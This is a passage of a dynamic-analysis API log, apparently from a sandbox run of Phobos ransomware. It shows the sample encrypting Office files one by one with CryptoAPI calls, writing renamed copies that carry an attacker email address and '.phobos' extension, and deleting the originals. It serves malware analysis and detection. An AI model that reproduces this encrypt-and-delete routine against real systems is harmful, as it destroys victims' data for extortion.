[0166.159] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll")) returned 1 [0166.161] SetEvent (hEvent=0xe8) returned 1 [0166.162] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.162] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.162] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=96608) returned 1 [0166.162] CloseHandle (hObject=0x17c) returned 1 [0166.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll")) returned 0x2020 [0166.162] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.162] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.162] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.162] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.162] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.163] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.163] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.163] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x17960, lpOverlapped=0x0) returned 1 [0166.179] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17970, dwBufLen=0x17970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17970) returned 1 [0166.180] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x17970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x17970, lpOverlapped=0x0) returned 1 [0166.182] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0166.182] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.182] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.182] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.182] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.182] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.182] CloseHandle (hObject=0x17c) returned 1 [0166.182] CloseHandle (hObject=0x130) returned 1 [0166.182] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll")) returned 1 [0166.184] SetEvent (hEvent=0xe8) returned 1 [0166.184] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.184] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.184] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=45920) returned 1 [0166.184] CloseHandle (hObject=0x130) returned 1 [0166.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll")) returned 0x2020 [0166.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.185] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.185] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.185] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.185] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.185] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.185] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.185] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xb360, lpOverlapped=0x0) returned 1 [0166.200] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb370, dwBufLen=0xb370 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb370) returned 1 [0166.201] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xb370, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xb370, lpOverlapped=0x0) returned 1 [0166.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0166.203] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.203] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.203] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.203] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.204] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.204] CloseHandle (hObject=0x130) returned 1 [0166.204] CloseHandle (hObject=0x17c) returned 1 [0166.204] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll")) returned 1 [0166.205] SetEvent (hEvent=0xe8) returned 1 [0166.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.205] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=31584) returned 1 [0166.205] CloseHandle (hObject=0x17c) returned 1 [0166.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll")) returned 0x2020 [0166.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.205] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.206] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.206] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.206] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7b60, lpOverlapped=0x0) returned 1 [0166.220] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7b70, dwBufLen=0x7b70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7b70) returned 1 [0166.221] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7b70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7b70, lpOverlapped=0x0) returned 1 [0166.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0166.222] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.222] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.222] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.222] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.222] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.222] CloseHandle (hObject=0x17c) returned 1 [0166.222] CloseHandle (hObject=0x130) returned 1 [0166.222] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll")) returned 1 [0166.223] SetEvent (hEvent=0xe8) returned 1 [0166.223] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.223] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.224] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=260960) returned 1 [0166.224] CloseHandle (hObject=0x130) returned 1 [0166.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll")) returned 0x2020 [0166.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.224] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.224] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.225] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.225] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3fb60, lpOverlapped=0x0) returned 1 [0166.364] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3fb70, dwBufLen=0x3fb70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3fb70) returned 1 [0166.365] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3fb70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3fb70, lpOverlapped=0x0) returned 1 [0166.370] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0166.370] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.370] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.370] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.370] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.370] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.370] CloseHandle (hObject=0x130) returned 1 [0166.370] CloseHandle (hObject=0x17c) returned 1 [0166.370] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll")) returned 1 [0166.372] SetEvent (hEvent=0xe8) returned 1 [0166.372] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.372] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.373] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=681312) returned 1 [0166.373] CloseHandle (hObject=0x17c) returned 1 [0166.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll")) returned 0x2020 [0166.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0166.373] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.373] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0166.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.373] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0166.373] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.373] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa6560, lpOverlapped=0x0) returned 1 [0166.397] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa6570, dwBufLen=0xa6570 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa6570) returned 1 [0166.402] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa6570, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa6570, lpOverlapped=0x0) returned 1 [0166.433] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0166.433] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0166.433] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0166.433] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.433] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0166.433] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.433] CloseHandle (hObject=0x17c) returned 1 [0166.433] CloseHandle (hObject=0x130) returned 1 [0166.434] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll")) returned 1 [0166.439] SetEvent (hEvent=0xe8) returned 1 [0166.439] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0166.439] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0166.439] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=11104) returned 1 [0166.439] CloseHandle (hObject=0x130) returned 1 [0166.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll")) returned 0x2020 [0166.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.439] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), 